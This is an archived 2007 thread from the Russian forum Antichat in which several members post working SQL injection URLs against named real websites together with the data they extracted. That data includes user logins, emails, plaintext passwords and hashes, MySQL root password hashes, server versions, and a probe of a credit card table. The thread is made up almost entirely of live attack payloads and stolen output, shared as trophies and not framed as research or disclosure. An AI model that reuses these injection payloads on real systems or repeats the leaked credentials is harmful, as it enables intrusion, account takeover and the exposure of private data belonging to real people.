ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.11.2007, 16:18
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.toofaced.com/ - что-то очень гламурное...
Код:
http://www.toofaced.com/product.asp?cat_id=-1+union+select+1,2,concat_ws(char(58),username,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+vendor_logins+limit+0,1/*
123:brittney_jensen@hotmail.com1:vtest
PBONTA:ralinda@planetbeauty.com  bontario
PBORAN:heather@planetbeauty.com:ORANGE
PBIRV:cole@planetbeauty.com:3881
PB1SAN:tarag@planetbeauty.com:123456
...
и т.д. лимитом
|
|
|
25.11.2007, 16:44
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
www.gamato.gr
Интересный сайтик 
БД 5'ой ветки.
Tables:
Код:
ID
NICK
PASSWORD
EMAIL
ICQ
Код:
http://www.gamato.gr/pictures.php?iid=-1)+union+select+1,2,3,4,concat_ws(0x3a,ID,NICK,PASSWORD,EMAIL,ICQ),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+gamato_fileish.f_users+limit+0,1+--+
admin:eac3a72a92235afabb94b33c3e23e8f0
www.expo.chelsi.ru
Код:
http://expo.chelsi.ru/mainexpo.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
5.0.26-lk-log:chelsiru_expo@localhost:chelsiru_expo
|
|
|
|
25.11.2007, 16:49
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Фонд стратегической культуры
Код:
http://www.fondsk.ru/article.php?id=-1+union+select+aes_decrypt(aes_encrypt(user(),0x71),0x71),123456789/*
u32888@10.10.223.204:5.0.45-log
Код:
http://www.safemaster.ru/verinfo.php?id=9999999+union+select+1,concat_ws(char(58),user(),database(),version())/*
u21044@10.10.10.209:u21044:5.0.45-log
Код:
http://www.100cotton.ru/index.php?id=-1+union+select+1,2,3,4,5,6,version(),database(),session_user(),10,11,12,13,14,15,16,17,18,19,20/*
siteis_user@localhost:4.1.22-standard
|
|
|
|
25.11.2007, 17:21
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Код:
http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(table_name+using+latin1),4,5,6,7,8,9,10+from+information_schema.tables+where+table_name+like+char(0x61,0x64,0x6d,0x69,0x6e,0x25)+limit+0,1/*
З.Ы.
Код:
http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID,username,password,nick,email)+using+latin1),4,5,6,7,8,9,10+from+bouncer.users+limit+0,1/*
http://www.challenge-tv.com/index.php?mode=filedetail&file=-1+union+select+1,2,convert(concat_ws(0x3a,ID)+using+latin1),4,5,6,7,8,9,10+from+dennis.admin+limit+0,1/*
Не пускают  |
|
|
|
25.11.2007, 19:44
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Код:
http://www.nalivaiko.ru/tovar.php?id=-1+union+select+concat(username,0x3a,password),2+from+admin/*
Oksana : oKSANA
Код:
http://baikal-iwf.com/main/bar.php?id=-1+union+select+1,concat(username,0x3a,password),3+from+users/*
test : test
Последний раз редактировалось Mike 007; 25.11.2007 в 19:57..
|
|
|
|
25.11.2007, 20:25
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Суздаль
http://www.suzd.net/
Код:
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,password+from+admins/*
Пароль админа : cdthrf56
Код:
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,table_name+from+INFORMATION_SCHEMA.TABLES/*
табицы
Код:
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,6+from+creditcards/*
creditcards - интересно...
Код:
http://www.suzd.net/news.php?id=-1+union+select+1,2,3,4,5,concat(id,1,11,1111,1111111)+from+creditcards/*
p.s: раньше я задавал много тупых вопросов, репа была -31. потихоньку исправляюсь, пошёл в гору 
и еще: этот пост большой и предыдущий тоже, поэтому я их и не объеденил. этот пост про www.suzd.net
Последний раз редактировалось Mike 007; 25.11.2007 в 20:39..
|
|
|
|
25.11.2007, 20:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
mara.by
http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1/*
4.0.18-standard-log/
http://www.mara.by/index.php?mode=detail&id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,concat_ws(0x 2F,login,password),29,30,31,32,33,34,35,36,37,38,3 9,40,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1+from+user+limit+1010,1/*
логин/хеш 1013 юзеров
|
|
|
|
25.11.2007, 20:46
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
Код:
http://www.abandoned.ru/pic.php?id=-1+union+select+1,2,3,concat_ws(char(58),user(),version(),database()),5,6/*
uryevich@localhost:4.0.18:abando
Казанский государственный университет (КГУ)
Код:
http://www.ksu.ru/tatnews.php?id=-20+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11/*
miu@localhost:4.0.18-log:kgu200
Код:
http://ecom-info.spb.ru/news/print.php?id=-773+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),user(),version(),database()),16,17,18,19,20,21,22,23,24,25,26/*
ecom@localhost:5.0.24a:ecom
Последний раз редактировалось Fata1ex; 25.11.2007 в 21:10..
|
|
|
|
25.11.2007, 20:48
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Код:
http://www.pocomaxa-extreme.ru/content/article.php?id=-1+union+select+1,user(),3,4,5,6,7,8,9,10,11/*
pocomaxa@localhost |
|
|
|
25.11.2007, 21:21
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
4job.ru
Код:
http://www.4job.ru/index.php?vac_id=-54183+union+select+concat(id,char(58),password)+from+users+limit+0,1/*
Версия - 4.1.22
Юзер - job4@localhost
Есть доступ к mysql.user
trailersbyniche.com
Код:
http://www.trailersbyniche.com/trailers_sites.php?categoryid=-21+union+select+1,2,aes_decrypt(aes_encrypt(concat(username,0x3a,password),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users/*
Версия - 4.1.16
Юзер - VIKING@LEASE631
Опять же можно прочитать данные из mysql.user
systema.ru
Код:
http://www.systema.ru/inc/bkard.php?Id=-6+union+select+1,2,3,4,user,password+from+mysql.user/*
Версия - 5.0.24a
Юзер - admin@www.systema.ru
5-ая ветка, соответственно можно прочитать из information_schema.tables, но из таблиц прочитать что-либо нельзя...
Зато существует доступ к mysql.user:
root - *A7CEC0AA91C37E406E05D39C4BC7C4B4B6064715
admin - *CE2618670420A28D6B759E9E0B8AE253F50DFD5B: nimda
znamenitosti.tv
Код:
http://znamenitosti.tv/base.php?content=index&language=ru&letter=-%D0%9E'+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,user(),16/*
Версия - 5.0.27-log
Юзер - skygsi_znamenit@88.208.19.12
Опять 5-ая ветка, но вновь облом, совершенно никаких таблиц с интересной информацией...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
